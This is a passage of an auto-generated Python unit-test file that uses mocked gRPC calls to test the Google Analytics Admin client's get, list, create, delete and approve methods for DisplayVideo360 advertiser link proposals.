with pytest.raises(ValueError): client.get_display_video360_advertiser_link_proposal( analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_proposal_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link_proposal), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLinkProposal() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLinkProposal() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_display_video360_advertiser_link_proposal( name="name_value", ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_proposal_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.get_display_video360_advertiser_link_proposal( analytics_admin.GetDisplayVideo360AdvertiserLinkProposalRequest(), name="name_value", ) def test_list_display_video360_advertiser_link_proposals( transport: str = "grpc", request_type=analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( next_page_token="next_page_token_value", ) response = client.list_display_video360_advertiser_link_proposals(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest() ) # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListDisplayVideo360AdvertiserLinkProposalsPager) assert response.next_page_token == "next_page_token_value" def test_list_display_video360_advertiser_link_proposals_from_dict(): test_list_display_video360_advertiser_link_proposals(request_type=dict) def test_list_display_video360_advertiser_link_proposals_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. 
client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: client.list_display_video360_advertiser_link_proposals() call.assert_called() _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest() ) @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_display_video360_advertiser_link_proposals(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest() ) # Establish that the response is the type that we expect. 
assert isinstance( response, pagers.ListDisplayVideo360AdvertiserLinkProposalsAsyncPager ) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_async_from_dict(): await test_list_display_video360_advertiser_link_proposals_async(request_type=dict) def test_list_display_video360_advertiser_link_proposals_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: call.return_value = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse() ) client.list_display_video360_advertiser_link_proposals(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse() ) await client.list_display_video360_advertiser_link_proposals(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_display_video360_advertiser_link_proposals_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_display_video360_advertiser_link_proposals(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_display_video360_advertiser_link_proposals_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): client.list_display_video360_advertiser_link_proposals( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse() ) call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_display_video360_advertiser_link_proposals( parent="parent_value", ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_display_video360_advertiser_link_proposals( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsRequest(), parent="parent_value", ) def test_list_display_video360_advertiser_link_proposals_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_display_video360_advertiser_link_proposals(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all( isinstance(i, resources.DisplayVideo360AdvertiserLinkProposal) for i in results ) def test_list_display_video360_advertiser_link_proposals_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], ), RuntimeError, ) pages = list( client.list_display_video360_advertiser_link_proposals(request={}).pages ) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], ), RuntimeError, ) async_pager = await client.list_display_video360_advertiser_link_proposals( request={}, ) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all( isinstance(i, resources.DisplayVideo360AdvertiserLinkProposal) for i in responses ) @pytest.mark.asyncio async def test_list_display_video360_advertiser_link_proposals_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_link_proposals), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinkProposalsResponse( display_video_360_advertiser_link_proposals=[ resources.DisplayVideo360AdvertiserLinkProposal(), resources.DisplayVideo360AdvertiserLinkProposal(), ], ), RuntimeError, ) pages = [] async for page_ in ( await client.list_display_video360_advertiser_link_proposals(request={}) ).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_create_display_video360_advertiser_link_proposal( transport: str = "grpc", request_type=analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. 
        call.return_value = resources.DisplayVideo360AdvertiserLinkProposal(
            name="name_value",
            advertiser_id="advertiser_id_value",
            advertiser_display_name="advertiser_display_name_value",
            validation_email="validation_email_value",
        )
        response = client.create_display_video360_advertiser_link_proposal(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert (
            args[0]
            == analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest()
        )

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.DisplayVideo360AdvertiserLinkProposal)
    assert response.name == "name_value"
    assert response.advertiser_id == "advertiser_id_value"
    assert response.advertiser_display_name == "advertiser_display_name_value"
    assert response.validation_email == "validation_email_value"


def test_create_display_video360_advertiser_link_proposal_from_dict():
    test_create_display_video360_advertiser_link_proposal(request_type=dict)


def test_create_display_video360_advertiser_link_proposal_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        client.create_display_video360_advertiser_link_proposal()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert (
            args[0]
            == analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest()
        )


@pytest.mark.asyncio
async def test_create_display_video360_advertiser_link_proposal_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.DisplayVideo360AdvertiserLinkProposal(
                name="name_value",
                advertiser_id="advertiser_id_value",
                advertiser_display_name="advertiser_display_name_value",
                validation_email="validation_email_value",
            )
        )
        response = await client.create_display_video360_advertiser_link_proposal(
            request
        )

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert (
            args[0]
            == analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest()
        )

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.DisplayVideo360AdvertiserLinkProposal)
    assert response.name == "name_value"
    assert response.advertiser_id == "advertiser_id_value"
    assert response.advertiser_display_name == "advertiser_display_name_value"
    assert response.validation_email == "validation_email_value"


@pytest.mark.asyncio
async def test_create_display_video360_advertiser_link_proposal_async_from_dict():
    await test_create_display_video360_advertiser_link_proposal_async(request_type=dict)


def test_create_display_video360_advertiser_link_proposal_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        call.return_value = resources.DisplayVideo360AdvertiserLinkProposal()
        client.create_display_video360_advertiser_link_proposal(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_create_display_video360_advertiser_link_proposal_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.DisplayVideo360AdvertiserLinkProposal()
        )
        await client.create_display_video360_advertiser_link_proposal(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


def test_create_display_video360_advertiser_link_proposal_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.DisplayVideo360AdvertiserLinkProposal()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.create_display_video360_advertiser_link_proposal(
            parent="parent_value",
            display_video_360_advertiser_link_proposal=resources.DisplayVideo360AdvertiserLinkProposal(
                name="name_value"
            ),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == "parent_value"
        assert args[
            0
        ].display_video_360_advertiser_link_proposal == resources.DisplayVideo360AdvertiserLinkProposal(
            name="name_value"
        )


def test_create_display_video360_advertiser_link_proposal_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.create_display_video360_advertiser_link_proposal(
            analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest(),
            parent="parent_value",
            display_video_360_advertiser_link_proposal=resources.DisplayVideo360AdvertiserLinkProposal(
                name="name_value"
            ),
        )


@pytest.mark.asyncio
async def test_create_display_video360_advertiser_link_proposal_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        # Designate an appropriate return value for the call.
        # NOTE(review): the next assignment is dead code — it is immediately
        # overwritten by the FakeUnaryUnaryCall assignment below (generator
        # artifact; harmless but redundant).
        call.return_value = resources.DisplayVideo360AdvertiserLinkProposal()

        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.DisplayVideo360AdvertiserLinkProposal()
        )
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.create_display_video360_advertiser_link_proposal(
            parent="parent_value",
            display_video_360_advertiser_link_proposal=resources.DisplayVideo360AdvertiserLinkProposal(
                name="name_value"
            ),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == "parent_value"
        assert args[
            0
        ].display_video_360_advertiser_link_proposal == resources.DisplayVideo360AdvertiserLinkProposal(
            name="name_value"
        )


@pytest.mark.asyncio
async def test_create_display_video360_advertiser_link_proposal_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.create_display_video360_advertiser_link_proposal(
            analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest(),
            parent="parent_value",
            display_video_360_advertiser_link_proposal=resources.DisplayVideo360AdvertiserLinkProposal(
                name="name_value"
            ),
        )


def test_delete_display_video360_advertiser_link_proposal(
    transport: str = "grpc",
    request_type=analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest,
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        response = client.delete_display_video360_advertiser_link_proposal(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert (
            args[0]
            == analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest()
        )

    # Establish that the response is the type that we expect.
    assert response is None


def test_delete_display_video360_advertiser_link_proposal_from_dict():
    test_delete_display_video360_advertiser_link_proposal(request_type=dict)


def test_delete_display_video360_advertiser_link_proposal_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        client.delete_display_video360_advertiser_link_proposal()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert (
            args[0]
            == analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest()
        )


@pytest.mark.asyncio
async def test_delete_display_video360_advertiser_link_proposal_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        response = await client.delete_display_video360_advertiser_link_proposal(
            request
        )

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert (
            args[0]
            == analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest()
        )

    # Establish that the response is the type that we expect.
    assert response is None


@pytest.mark.asyncio
async def test_delete_display_video360_advertiser_link_proposal_async_from_dict():
    await test_delete_display_video360_advertiser_link_proposal_async(request_type=dict)


def test_delete_display_video360_advertiser_link_proposal_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        call.return_value = None
        client.delete_display_video360_advertiser_link_proposal(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_delete_display_video360_advertiser_link_proposal_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        await client.delete_display_video360_advertiser_link_proposal(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_delete_display_video360_advertiser_link_proposal_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.delete_display_video360_advertiser_link_proposal(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


def test_delete_display_video360_advertiser_link_proposal_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.delete_display_video360_advertiser_link_proposal(
            analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest(),
            name="name_value",
        )


@pytest.mark.asyncio
async def test_delete_display_video360_advertiser_link_proposal_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        # Designate an appropriate return value for the call.
        # NOTE(review): the next assignment is dead code — it is immediately
        # overwritten by the FakeUnaryUnaryCall assignment below (generator
        # artifact; harmless but redundant).
        call.return_value = None
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.delete_display_video360_advertiser_link_proposal(
            name="name_value",
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


@pytest.mark.asyncio
async def test_delete_display_video360_advertiser_link_proposal_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.delete_display_video360_advertiser_link_proposal(
            analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest(),
            name="name_value",
        )


def test_approve_display_video360_advertiser_link_proposal(
    transport: str = "grpc",
    request_type=analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest,
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.approve_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = (
            analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalResponse()
        )
        response = client.approve_display_video360_advertiser_link_proposal(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert (
            args[0]
